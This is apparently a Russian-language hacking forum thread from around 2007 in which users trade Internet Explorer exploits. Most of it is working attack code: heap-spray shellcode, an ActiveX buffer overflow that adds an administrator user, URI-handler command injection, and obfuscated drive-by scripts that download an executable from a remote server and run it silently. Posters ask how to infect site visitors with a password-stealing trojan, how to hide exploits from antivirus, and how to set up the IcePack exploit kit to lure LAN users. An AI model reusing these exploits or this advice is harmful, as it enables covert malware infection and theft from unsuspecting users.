"%u8918%uB09D%u0004%u3100%u6AC0%u6804%u1000%u0000%u 0068%u0010" +
"%u5000%u95FF%u050C%u0000%uC009%u840F%u013B%u0000%u 8589%u04B4" +
"%u0000%u9D8B%u049C%u0000%u1889%u8B66%uE69D%u0004%u 6600%u5889" +
"%u8D14%u119D%u0003%u8900%u3C58%u0F6A%uB5FF%u04A4%u 0000%u95FF" +
"%u04F8%u0000%u858B%u04B4%u0000%uBD8B%u04B8%u0000%u 0789%u3160" +
"%u50C0%uB5FF%u049C%u0000%u95FF%u0558%u0000%u8B61%u B085%u0004" +
"%u8900%uFF07%uACB5%u0004%uFF00%uA4B5%u0004%uFF00%u F895%u0004" +
"%uFF00%u98B5%u0004%uFF00%u0895%u0005%uFF00%u9CB5%u 0004%uFF00" +
"%u5C95%u0005%u6800%u4000%u0000%u0068%u0010%uFF00%u B4B5%u0004" +
"%uFF00%u1095%u0005%u8D00%u1F85%u0006%u5000%uB5FF%u 04BC%u0000" +
"%u1CE8%u0002%u8D00%u3585%u0006%u5000%uB5FF%u04C0%u 0000%u0AE8" +
"%u0002%u8D00%u5F85%u0006%u5000%uB5FF%u04C4%u0000%u F8E8%u0001" +
"%u8D00%u7185%u0006%u5000%uB5FF%u04C8%u0000%uE6E8%u 0001%u8D00" +
"%u8385%u0006%u5000%uB5FF%u04CC%u0000%uD4E8%u0001%u 8D00%u9585" +
"%u0006%u5000%uB5FF%u04D0%u0000%uC2E8%u0001%u3100%u 6AC0%u8D10" +
"%u689D%u0005%u5300%u9D8D%u0578%u0000%u5053%u95FF%u 0528%u0000" +
"%uC031%u5450%uB5FF%u0494%u0000%uCB68%u0006%u8D00%u 0085%u0000" +
"%u5000%u95FF%u0514%u0000%uC483%u8B04%u2C95%u0005%u 8D00%u009A" +
"%u0001%u8900%uFCE6%u3B64%u0435%u0000%u7300%uAD19%u D039%uF276" +
"%uD839%uEE73%u468D%u89F8%u2444%u611C%uC489%u315D%u C2C0%u0018" +
"%uC031%uF0F7%uFACC%uE860%u0000%u0000%u815D%u18ED%u 0003%u6600" +
"%uE08C%u8366%u30F8%u1575%uA164%u0124%u0000%u8589%u 04C0%u0000" +
"%u408B%u8944%uBC85%u0004%u0F00%uC020%u8589%u04C4%u 0000%u200F" +
"%u89D0%uC885%u0004%u0F00%uD820%u8589%u04CC%u0000%u 200F%u89E0" +
"%uD085%u0004%u6100%uC031%uFB40%u60C3%u00E8%u0000%u 5D00%uED81" +
"%u036D%u0000%uBD8D%u04EC%u0000%u47E8%u0000%u0900%u 74C0%uFC3F" +
"%uC689%u3F83%u7400%uFF0F%u5637%u68E8%u0000%u0900%u 74C0%uAB2B" +
"%uECEB%uC783%u8304%u003F%u1774%uF889%u5040%u95FF%u 04EC%u0000" +
"%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD%u40C0%u 4489%u1C24" +
"%uC361%uC031%uF6EB%u3152%u64C0%u008B%u108B%u7442%u 8B04%uEB00" +
"%u8BF7%u0440%u0025%uFF00%u66FF%u3881%u5A4D%u0774%u 002D%u0100" +
"%uEB00%u8BF2%u3C50%u3C81%u5010%u0045%u7400%u3102%u 5AC0%u60C3" +
"%u448B%u2424%u4003%u8D3C%u1840%u408D%u8B60%u0938%u 74FF%u0352" +
"%u247C%u8B24%u184F%u5F8B%u0320%u245C%uFC24%u7C49%u 8B40%u8B34" +
"%u7403%u2424%uC031%uAC99%uC008%u0774%uC2C1%u0107%u EBC2%u3BF4" +
"%u2454%u7528%u8BE1%u2457%u5403%u2424%uB70F%u4A04%u E0C1%u8B02" +
"%u1C57%u5403%u2424%u048B%u0310%u2444%u8924%u2444%u 611C%u08C2" +
"%u3100%uEBC0%u60F4%u548B%u2424%u7C8B%u2824%u08B9%u 0000%uFD00" +
"%u7C8D%uFF0F%uD088%u0F24%u3004%u393C%u0276%u0704%u C1AA%u04EA" +
"%uEEE2%u61FC%u08C2%u0000%u0000%u0000%u0000%u0000%u 0000%u0000" +
"%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u 0000%u0000" +
"%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u 0000%u0000" +
"%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u 0000%u0000" +
"%u0000%u0000%u0000%u0000%u0000%u0000%u0300%u0001%u 0000%u0000" +
"%uFFC9%u10DF%u8FDB%u9876%u6B0B%u89D2%u6B0B%u89DE%u E60F%u0B08" +
"%uE7A6%u3983%u910E%uD782%u9266%u4982%u99C0%u9291%u 9FA8%uBBC6" +
"%u12C8%u9711%u0000%u0000%u750C%u6573%u3372%u2E32%u 6C64%u006C" +
"%u96F2%u4C43%u854C%u4BFD%u0000%u0000%u6E0C%u6474%u 6C6C%u642E" +
"%u6C6C%u0000%u0491%uA8D8%u0000%u0000%u670C%u6964%u 3233%u642E" +
"%u6C6C%u0000%uD6E4%uC5C6%u62C6%u582D%uA1E8%u934B%u 0000%u0000" +
"%u0000%u0000%u6952%u676E%u2030%u6572%u6F70%u7472%u 0000%u0000" +
"%u534D%u5720%u6E69%u6F64%u7377%u2820%u412E%u494E%u 2029%u4447" +
"%u2049%u6552%u6F6D%u6574%u4520%u656C%u6176%u6974%u 6E6F%u6F20" +
"%u2066%u7250%u7669%u6C69%u6765%u2065%u7845%u6C70%u 696F%u2074" +
"%u4D28%u3053%u2D37%u3130%u2937%u0D0A%u6F43%u6564%u 2064%u7962" +
"%u4C20%u6F69%u656E%u206C%u2764%u6148%u6575%u656E%u 736E%u0D0A" +
"%u7468%u7074%u2F3A%u772F%u7777%u6C2E%u6261%u2D6F%u 7361%u6F73" +
"%u632E%u6D6F%u0D0A%u0D0A%u6F46%u2072%u6465%u6375%u 7461%u6F69" +
"%u616E%u206C%u6E6F%u796C%u2120%u0D0A%u0D0A%u504B%u 4F52%u4543" +
"%u5353%u3A20%u3020%u3F78%u3F3F%u3F3F%u3F3F%u0A3F%u 4B0D%u4854" +
"%u4552%u4441%u3A20%u3020%u3F78%u3F3F%u3F3F%u3F3F%u 0A3F%u0A0D" +
"%u430D%u6E6F%u7274%u6C6F%u5220%u6765%u7369%u6574%u 7372%u0A3A" +
"%u0A0D%u430D%u3052%u3A20%u3020%u3F78%u3F3F%u3F3F%u 3F3F%u0A3F" +
"%u430D%u3252%u3A20%u3020%u3F78%u3F3F%u3F3F%u3F3F%u 0A3F%u430D" +
"%u3352%u3A20%u3020%u3F78%u3F3F%u3F3F%u3F3F%u0A3F%u 430D%u3452" +
"%u3A20%u3020%u3F78%u3F3F%u3F3F%u3F3F%u003F%u9090%u 6090%u858D" +
"%u0000%u0000%uE083%u7403%uF718%u83D8%u04C0%u9EB9%u 0006%u8D00" +
"%u0DB4%uFFFF%uFFFF%u3C8D%uFD06%uA4F3%u61FC%u0483%u 0324%u90C3");

function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return (spraySlide);
}

if (confirm ("This exploit execute code with kernel privilege.\n"
+"Do you want to take really this risk? :p"))
{
var SizeOfHeapEntry = 0x28;
var heapSprayToAddress = 0x04040404;
var payLoadSize = payLoadCode.length * 2;
var heapBlockSize = 0x400000;
var spraySlide = unescape("%u9090%u9090");
var spraySlideSize = heapBlockSize - (payLoadSize + SizeOfHeapEntry);
var heapBlocks = (heapSprayToAddress-01000000)/heapBlockSize;
var memory = new Array();
spraySlide = getSpraySlide(spraySlide,spraySlideSize);

for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}

document.write("<HTML><BODY><style>BODY{CURSOR: url('ani.htm')}</style></BODY></HTML>");
}
</SCRIPT>

Тройка сплоитов под Intenet Explorer. Как был дыряв, так и остался...
Взято с Милворма (http://milw0rm.com) :

MS Internet Explorer <= 7 Remote Arbitrary File Rewrite PoC (MS07-027) (http://milw0rm.com/exploits/3892)

IE 6 / Ademco, co., ltd. ATNBaseLoader100 Module Remote BoF Exploit (http://milw0rm.com/exploits/3993)

IE6 / Provideo Camimage (ISSCamControl.dll 1.0.1.5) Remote BoF Exploit (http://milw0rm.com/exploits/4023)

Тройка сплоитов под Intenet Explorer. Как был дыряв, так и остался...


Ты как был дебил так и остался , прежде чем делать такие громкие заявления посмотри сами эксплоиты.Они в основном под ActiveX компоненты но не под ие

Microsoft Speech Api Activex Control Remote Bof Exploit (xp Sp2)

Цель: Microsoft Windows XP
Воздействие: Выполнение произвольного кода
MS07-033_expl2.htm


<!--
6.30 10/06/2007
Microsoft Windows DirectSpeechSynthesis Module (XVoice.dll 4.0.4.2512)
/ DirectSpeechRecognition Module (Xlisten.dll 4.0.4.2512)
remote buffer overflow exploit/ xp sp2 version

both dlls are vulnerable, this is the poc for the first one
worked regardless of boot.ini settings, remotely and
by dragging the html file in the browser window
tested against IE 6

by A. Micalizzi (aka rgod )

this is dedicated to Sara, and greetings to shinnai, a good comrade

***note: this was indipendently discovered by me and Will Dormann during the
same period, documented here:

http://www.kb.cert.org/vuls/id/507433
http://www.microsoft.com/technet/security/Bulletin/MS07-033.mspx

the affected package,
http://www.microsoft.com/speech/AppHelp(SAPI4)/sapi4.asp

is still distributed with the kill bit not set
-->

<html>
<object classid='clsid:EEE78591-FE22-11D0-8BEF-0060081841DE' id='DirectSS'></OBJECT>
<script language='vbscript'>

REM metasploit, add a user 'su' with pass 'tzu'
scode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%3 7%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58% 50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41 %30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%5 4%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c% 47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63 %6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%7 1%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74% 76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47 %4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%5 4%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f% 77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f %79%61%4c%71%34%56%64%48%43%54%71%4b%70%31%74%4c%4 b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43%70% 46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68 %6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6 b%62%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59% 58%78%6d%53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d %32%70%73%41%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6 f%38%67%33%53%30%6d%75%34%41%30%66%4f%70%63%65%70% 52%4e%43%55%31%64%31%30%74%35%33%43%63%55%51%62%31 %30%51%63%41%65%47%50%32%54%30%7a%42%55%61%30%36%4 f%30%61%43%54%71%74%35%70%57%56%65%70%70%6e%61%75% 52%54%45%70%32%4c%70%6f%70%63%73%51%72%4c%32%47%54 %32%32%4f%42%55%30%70%55%70%71%51%65%34%32%4d%62%4 9%50%6e%42%49%74%33%62%54%43%42%30%61%42%54%70%6f% 50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32%41%61 %74%71%74%35%50%44") + NOP

eax= unescape("%ff%13")
ebp= unescape("%ff%13")
eip= unescape("%01%0a") : REM jmp to scode, UNICODE expanded
jnk= string(50,unescape("%13"))

suntzu = string(888,"A") + ebp + eip + eax + jnk

bufferI = string(9999999,"X")
bufferII = string(9999999,"Y")
bufferIII = string(9999999,"Z")
bufferIV = string(9999999,"O")

EngineID= string(200000,"b")
MfgName="default"
ProductName="default"
ModeID= string(199544,unescape("%90")) + scode
ModeName= suntzu
LanguageID=1
Dialect="default"
Speaker="default"
Style=1
Gender=1
Age=1
Features=1
Interfaces=1
EngineFeatures=1
RankEngineID=1
RankMfgName=1
RankProductName=1
RankModeID=1
RankModeName=1
RankLanguage=1
RankDialect=1
RankSpeaker=1
RankStyle=1
RankGender=1
RankAge=1
RankFeatures=1
RankInterfaces=1
RankEngineFeatures=1

DirectSS.FindEngine EngineID, MfgName, ProductName, ModeID, ModeName, LanguageID, Dialect, Speaker, Style, Gender, Age, Features, Interfaces, EngineFeatures, RankEngineID, RankMfgName, RankProductName, RankModeID, RankModeName, RankLanguage, RankDialect, RankSpeaker, RankStyle, RankGender, RankAge, RankFeatures, RankInterfaces, RankEngineFeatures

</script>
</html>

Выполнение произвольного кода в Microsoft Internet Explorer
Версии: 6.x, 7.x
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.
Уязвимость существует из-за ошибки в обработчике URL FirefoxURL в Осле на системах с установленой Лисой.
Удаленный пользователь может с помощью специально сформированной Web страницы, при выполнении в ИЕ изменить путь к Mozilla Firefox и выполнить произвольный код на целевой системе.
Пример: http://larholm.com/vuln/firefoxurl.html

<html><body>
<iframe src="firefoxurl://larholm.com" -chrome "javascript:C=Components.classes;I=Components.inter faces;
file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);
file.initWithPath('C:'+String.fromCharCode(92)+Str ing.fromCharCode(92)+'Windows'+
String.fromCharCode(92)+String.fromCharCode(92)+'S ystem32'+String.fromCharCode(92)+
String.fromCharCode(92)+'cmd.exe');
process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);
process.init(file);
process.run(true,[calc],1);">
</body></html>

ЗЫ
Короче вариант рабочий, но только если у целевого пользователя стоит и Осел и Лиса. Имхо если так то врядли пользователь полезет на страницу через Осла. Но запостил т.к. все-таки уязвимость в IE.

Как ваще пользоватся сплоитом?
Например : [Internet Explorer Cursor Processing Remote DoS]
РАсскажите или снимите видео плиз, я ваще непойму как это ваще творится хочу научится!

DirectX Media Remote Overflow DoS Exploit
Internet Explorer ver 6.0
<object classid="clsid:421516C1-3CF8-11D2-952A-00C04FA34F05" id="Chroma"></object>

<input language=VBScript onclick=jojo() type=button value="Click here to start Exploit"><script language='vbscript'>
Sub jojo
buff = String(999999, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAaA")

get_EDX = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbccccccc ccccccddddddddddeee"

buff1 = String(999999, "BBBBBBBBBBBBBBBBBBBBBBBBBBBBbb")

egg = buff + get_EDX + buff1 + scode

Chroma.Color = egg
End Sub
</script>
Проверить здесь (http://www.milw0rm.com/exploit.php?id=4251)

Программа:
Microsoft Internet Explorer 7.x
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows XP Home Edition
Microsoft Windows XP Professional


Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в обработчиках URI при проверке системных, используемых по умолчанию URI (например, "mailto", "news", "nntp", "snews", "telnet"). Атакующий может обманным образом заманить пользователя на специально составленный сайт, содержащий, например, "mailto" URI с символом "%" и заканчивающийся определенным расширением(например, ".bat", ".cmd") что приведет к выполнению произвольного кода на целевой системе.

Успешное эксплуатирование уязвимости требует наличие установленного в системе Microsoft Internet Explorer 7.


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />
<title>Тест линк</title>
</head>

<body>
<p><a href="mailto:test%../../../../windows/system32/calc.exe.cmd">mailto</a></p>
<p><a href="telnet:// rundll32.exe url.dll,TelnetProtocolHandler %l">telnet</a></p>
<p><a href="news:// “%ProgramFiles%\Outlook Express\msimn.exe” /newsurl:%1">news</a></p>
<p><a href="nntp:// “%ProgramFiles%\Outlook Express\msimn.exe” /newsurl:%1">nntp</a></p>
<p><a href="snews:// “%ProgramFiles%\Outlook Express\msimn.exe” /newsurl:%1">snews</a></p>
<p><a href="mailto:// C:\lotus\notes\notes.exe /defini %1">mailto</a></p>
<p><a href="nntp:%00/../../../windows/system32/calc.exe”.bat">nntp</a></p>
</body>
</html>


ЗЫ Кто затестит на седьмом осле?

Кто затестит на седьмом осле?Попробовал. Эффекта не добился.

А я давно её обнаружил когда еще фаерфокс 1.0.7 был ,только делал по другому вставлял редикт на .exe типа http://../../../../../1.exe

Цель: Internet Explorer 6

Воздействие: Отказ в обслуживании

<html>
<body>
<script language="javascript">
var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
xmlDoc.loadXML("<dummy></dummy>");
var txt = xmlDoc.createTextNode("huh");
var out = txt.substringData(1,0x7fffffff);
</script>
</body>
</html>

хз че он делает :confused:

2007-09-05 GlobalLink 2.7.0.8 glItemCom.dll SetInfo() Heap Overflow Exploit (http://milw0rm.com/exploits/4366)

прив. всем. Вот хотелбы спросить , есть ли статья для Новечков как пользоваться сплоитам ... в Общем мне нужно тока одно чтоб человек заходил на сайт и ему загружался трой ( Пинчег ) . Кто может дать сылку на статью про Сплоиты и какой сплоит посоветуйте для этого , онли паблик ... Просто друг мне еще обещал закриптить его ...

Уязвимости в Microsoft Internet Explorer (всего 117 (http://www.xakep.ru/vulnerability/Microsoft%20Internet%20Explorer/) ).



Уязвимость позволяет удаленному пользователю получить доступ к важным данным.



<script>

function Clear() {
document.getElementById("label1").htmlFor="file1";
document.getElementById("text1").focus();
}

function Down() {
document.getElementById("file1").focus();
}

</script>

<input type="file" id="file1" name="file1" onkeydown="Clear()" onkeyup="Clear()" />
<label id="label1" name="label1"></label>
<br />
<textarea name="text1" id="text1" onkeydown="Down()">
</textarea>



© securitylab.ру

Internet Explorer has standart ImageBase address and PE Win32 header is started at 0x00400000 in memory. So memory cell at the address
0x00400008 contains the short value 0x0004 and at the address
0x00400011 it contains the long value 0x00000000 in any case.
I used these addresses for generating of TIFF-file that uses vulnerability and for controling of EIP.

This exploit tested on:
- Windows 2000 SP4 + IE5.01
- Windows 2000 SP4 + IE5.5
- Windows 2000 SP4 + IE6.0 SP1
_http://www.milw0rm.com/exploits/4616 2007-11-11

прив. всем. Вот хотелбы спросить , есть ли статья для Новечков как пользоваться сплоитам ... в Общем мне нужно тока одно чтоб человек заходил на сайт и ему загружался трой ( Пинчег ) . Кто может дать сылку на статью про Сплоиты и какой сплоит посоветуйте для этого , онли паблик ... Просто друг мне еще обещал закриптить его ...Меня тоже интересует ! Дайте пожалуйста линк где можно об этом почитать !

to tusman & L0n1

вот видео....
http://video.antichat.ru/file179.html

to tusman & L0n1

вот видео....
http://video.antichat.ru/file179.html
Скрипт палицца. Как его криптануть шолей?))

пара эксплоитов для для ие 6, последний билд авант браузера тож пробивает. позволяет скачать и запустить файл :) хз выкладывалось или нет, кто сможет криптануть мне в личку напишите

<SCRIPT language="VBScript">

Module_Path="http://путь до файла.exe"

If navigator.appName="Microsoft Internet Explorer" Then

If InStr(navigator.platform,"Win32") <> 0 Then

Const ssfFONTS=20
Const adModeReadWrite=3
Const adTypeBinary=1
Const adSaveCreateOverWrite=2

Dim oRDS
Dim oXMLHTTP
Dim oFSO
Dim oStream
Dim oWShell
Dim oShellApp

Dim WinDir
Dim ExeName
Dim XMLBody
Dim PluginFile
Dim cByte
Dim ObjName
Dim ObjProg

Randomize

ExeName=GenerateName()
ExeName=ExeName & ".exe"

cls1="clsid:BD96"
cls2="C556-65A"
cls3="3-11D0-9"
cls4="83A-00C04FC29E36"
clsfull=cls1&cls2&cls3&cls4

Set oRDS=document.createElement("object")
oRDS.setAttribute "id","oRDS"
oRDS.setAttribute "classid",clsfull

Set oShellApp = oRDS.CreateObject("Shell.Application","")
Set oFolder = oShellApp.NameSpace(ssfFONTS)
Set oFolderItem=oFolder.ParseName("Symbol.ttf")
Font_Path_Components=Split(oFolderItem.Path,"\",-1,1)
WinDir= Font_Path_Components(0) & "\" & Font_Path_Components(1) & "\"
ExeName=WinDir & ExeName

ObjName="Microsoft"
ObjProg="XMLHTTP"
set oXMLHTTP = CreateObject(ObjName & "." & ObjProg)
Req_type="G" & "E" & "T"
HTTPSession=oXMLHTTP.Open(Req_Type,Module_Path,0)
oXMLHTTP.Send()
On Error Resume Next
XMLBody=oXMLHTTP.responseBody

ObjName="ADODB"
ObjProg="Stream"
On Error Resume Next
Set oStream=oRDS.CreateObject(ObjName & "." & ObjProg,"")
If Err.number <> 0 Then

Set oFSO=oRDS.CreateObject("Scripting.FileSystemObject","")
Set PluginFile=oFSO.CreateTextFile(ExeName, TRUE)
Plugin_size=LenB(XMLBody)

For j=1 To Plugin_size
cByte=MidB(XMLBody,j,1)
ByteCode=AscB(cByte)
PluginFile.Write(Chr(ByteCode))
Next
PluginFile.Close

Set oWShell=oRDS.CreateObject("WScript.Shell","")
On Error Resume Next
oWShell.Run (ExeName),1,FALSE
Else
oStream.Mode=adModeReadWrite
oStream.Type=adTypeBinary
oStream.Open
oStream.Write XMLBody
oStream.SaveToFile ExeName,adSaveCreateOverWrite

oShellApp.ShellExecute ExeName
End If


End If
End If

Function GenerateName()
RandomName=""
rr=Int(8*Rnd)
ik=0
Do
ii=Int(25*Rnd)+97
RandomName=RandomName+Chr(ii)
ik=ik+1
Loop While ik<rr
GenerateName=RandomName
End Function

</SCRIPT>

<SCRIPT language="javascript">

var bb949531092ff = "http://путь до файла";
function CreateO(o, n) {
var r = null;

try { eval('r = o.CreateObject(n)') }catch(e){}

if (! r) {
try { eval('r = o.CreateObject(n, "")') }catch(e){}
}

if (! r) {
try { eval('r = o.CreateObject(n, "", "")') }catch(e){}
}

if (! r) {
try { eval('r = o.GetObject("", n)') }catch(e){}
}

if (! r) {
try { eval('r = o.GetObject(n, "")') }catch(e){}
}

if (! r) {
try { eval('r = o.GetObject(n)') }catch(e){}
}

return(r);
}

function Go(a) {
var s = CreateO(a, "WSc"+"rip"+"t.Sh"+"ell");
var o = CreateO(a, "ADO"+"DB.Str"+"eam");
var e = s.Environment("Process");

var bb351865611ff = null;
var bin = e.Item("TEMP")+ "\\" + "fdklkjTUFOYUT.exe";
var bb532058559ff;

try { bb351865611ff=new XMLHttpRequest(); }
catch(e) {
try { bb351865611ff = new ActiveXObject("Micr"+"osoft.XMLH"+"TTP"); }
catch(e) {
bb351865611ff = new ActiveXObject("MS"+"XML2.Serv"+"erXMLH"+"TTP");
}
}

if (! bb351865611ff) return(0);

bb351865611ff.open("GET", bb949531092ff, false)
bb351865611ff.send(null);
bb532058559ff = bb351865611ff.responseBody;

o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(bb532058559ff);
o.SaveToFile(bin, 2);

s.Run(bin,0);
}

var i = 0;
var bb804375678ff = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}','{BD96C556-65A3-11D0-983A-00C04FC29E36}','{AB9BCEDD-EC7E-47E1-9322-D4A210617116}','{0006F033-0000-0000-C000-000000000046}','{0006F03A-0000-0000-C000-000000000046}','{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}','{6414512B-B978-451D-A0D8-FCFDF33E833C}','{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}','{06723E09-F4C2-43c8-8358-09FCD1DB0766}','{639F725F-1B2D-4831-A9FD-874847682010}','{BA018599-1DB3-44f9-83B4-461454C84BF8}','{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}','{E8CCCDDF-CA28-496b-B050-6C07C962476B}',null);

while (bb804375678ff[i]) {
var a = null;

if (bb804375678ff[i].substring(0,1) == '{') {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + bb804375678ff[i].substring(1, bb804375678ff[i].length - 1));
} else {
try { a = new ActiveXObject(bb804375678ff[i]); } catch(e){}
}

if (a) {
try {
var b = CreateO(a, "WSc"+"ript.She"+"ll");
if (b) {
Go(a);
//return(0);
}
} catch(e){}
}
i++;
}

</script>

Снайпер В разделе статъи полась

Всем прет )
Я понимаю что моя репа желает лучшего ) но может кто подскажет какой нить на данный момент рабочий не палющийся експлойт для закачки и запуска удаленного файла ?
Биг спасибо всем кто откликнется !)

Всем прет )
Я понимаю что моя репа желает лучшего ) но может кто подскажет какой нить на данный момент рабочий не палющийся експлойт для закачки и запуска удаленного файла ?
Биг спасибо всем кто откликнется !)

вот не в обиду тебе сказанно , но ты опять написал глупость :D , во первых которые в паблике (они все паляться ) , которые не ПАЛЯТСЯ ( все приватные ) , а для закачки и запуска, найди и скачай icepack в инете его полно ;)

зы чтобы не было вопросов далее про icepack , поясняю , нашёл , скачал , если в ты в локалке ставишь себе Denver и тд и тп , далее заливаешь этот пакет ,на сервер , настраеваешь(этот пакет) через админку icepacka, то есть зальёшь нужные тебе файлы (трой ),далее отмечаешь какие он будет пробивать браузеры (iE 6 пробивается ) , делаешь ссылку на твой ресурс http://tusman.com , для локалки http://xxx.xxx.xxx.xxx/ и вперёд .

зы но сначало проверь на себе !

мда, так ничего, вполне рабочий способ, но я больше предпочитаю работать с Metasploit Framework. Вручную, конечно некоторым сложно обновлять эксплойты, но по-моему им проще пользоваться.

мда, так ничего, вполне рабочий способ, но я больше предпочитаю работать с Metasploit Framework. Вручную, конечно некоторым сложно обновлять эксплойты, но по-моему им проще пользоваться.

я тоже предпочитаю юзать Metasploit Framework3 , но у меня только один сплоит ms06_001_wmf_setabortpro пашет по ХР sp2 , да и если в локалке шалить :D , то нужно ссылку кидать а там порт 8080 , начинаются вопросы типа " а это что радио ? и что там за музон " :D
а это весит ресурс с заряженным icpackом , типа "порно для нашей любимой локалки " :D , а там уже дело чела идти на это ресурс или нет , хотя из 100% 89 зайдут ;)

зы а обновлять экслпоты можно через Metasploit Framework3 Online Update

я тоже предпочитаю юзать Metasploit Framework3 , но у меня только один сплоит ms06_001_wmf_setabortpro пашет по ХР sp2 , да и если в локалке шалить :D , то нужно ссылку кидать а там порт 8080 , начинаются вопросы типа " а это что радио ? и что там за музон " :D
а это весит ресурс с заряженным icpackом , типа "порно для нашей любимой локалки " :D , а там уже дело чела идти на это ресурс или нет , хотя из 100% 89 зайдут ;)

зы а обновлять экслпоты можно через Metasploit Framework3 Online Update

а не судьба поменять порт на 80 ?? :)

Belfigor открываешь msfweb,в браузер вбиваешь http://127.0.0.1.:55555,ищешь свой сплойт,а там и сам дальше разберёшься,можно какие угодно порты вписывать))

Выложите сплоит для ie7

<!--
Secunia Advisory: SA22542
Release Date: 2006-10-25
Impact: Spoofing
Solution Status: Unpatched
Software: Microsoft Internet Explorer 7.x

Description:
A weakness has been discovered in Internet Explorer, which can be exploited by malicious
people to conduct phishing attacks.

The problem is that it's possible to display a popup with a somewhat spoofed address bar
where a number of special characters have been appended to the URL. This makes it possible
to only display a part of the address bar, which may trick users into performing certain
unintended actions.

Secunia has constructed a demonstration, which is available at:
http://secunia.com/internet_explorer_7_popup_address_bar_spoofing_tes t/

The weakness is confirmed in Internet Explorer 7 on a fully patched Windows XP SP2 system.

Solution:
Do not follow links from untrusted sources.

Provided and/or discovered by:
Discovered by an anonymous person.
-->

<script language="JavaScript">
function StartTest()
{
var padding = '';
for ( i=0 ; i<108 ; i++)
{
padding += unescape("%A0");
}
newWindow = window.open("", "Win", "width=500,height=325,scrollbars=yes");
newWindow.moveTo( (screen.width-325) , 0 );
newWindow.document.location = "/result_22542/?" + unescape("%A0") + unescape("%A0") + "http://www.microsoft.com/"+padding;
document.location = "http://www.microsoft.com/windows/ie/default.mspx";
}
StartTest()
</script>

# milw0rm.com [2006-10-26]

Да метасплоит говно! как можно вывесить у себя на тачке сервак? ето бред полный.

Да метасплоит говно! как можно вывесить у себя на тачке сервак? ето бред полный.
Легко! Я вывешивал!

Выложите, у кого есть линк на статью о примотке нового сплойта к связке сплоитов...

https://forum.antichat.ru/thread58567.html

sploint под IE7

<html>
<head>
<title>IE7</title>
</head>
<body>
<script type="text/vbscript">
on error resume next
Set df = document.createElement("object")
df.setAttribute "clas"&"sid", "clsid:BD96C"&"556-65A3-11D0-"&"983A-00C04F"&"C29E36"
str="Microsoft"&"."&"XMLHTTP"
Set x = df.CreateObject(str,"")
var1="Ad"
var2="od"
var3="b."
var4="St"
var5="re"
var6="am"
str1=var1&var2&var3&var4&var5&var6

str5=str1
set S = df.createobject(str5,"")
for count = 0 to 4
S.type = 1
lnk="site.com/file.exe"
x.Open "G"&"E"&"T",lnk,0
x.Send
set F = df.createobject("Script"&"ing.FileSys"&"temObject","")
if count = 0 then tmp = "c:windowstemp" else if count = 1 then tmp = "c:" else if count = 2 then tmp = "c:temp" else if count = 3 then tmp = "d:windowstemp" else if count = 4 then tmp = "d:" end if
fname1= F.BuildPath(tmp,"svacm.exe")
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
if err.number = 0 then
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"INSTALL","","open",0
exit for
else
Err.Clear
End if
next
</script>
</body>
</html>

юзаем и говорим о результатах.

XaCeRoC
это для ИЕ6, пробивает больше половины ИЕ6.

XaCeRoC
это для ИЕ6, пробивает больше половины ИЕ6.
тогда сорьь

ищу хорошую связку может у ково есть дайте и о пишите как настроить её спасибо!

sploint под IE7



юзаем и говорим о результатах.
Напишите в краце как можно примотать сплоит к связке или линк на статейку киньте... заранее спс
и желательно на примере какой нть связки ( ice pack или armitage)

Напишите в краце как можно примотать сплоит к связке или линк на статейку киньте... заранее спс
и желательно на примере какой нть связки ( ice pack или armitage)

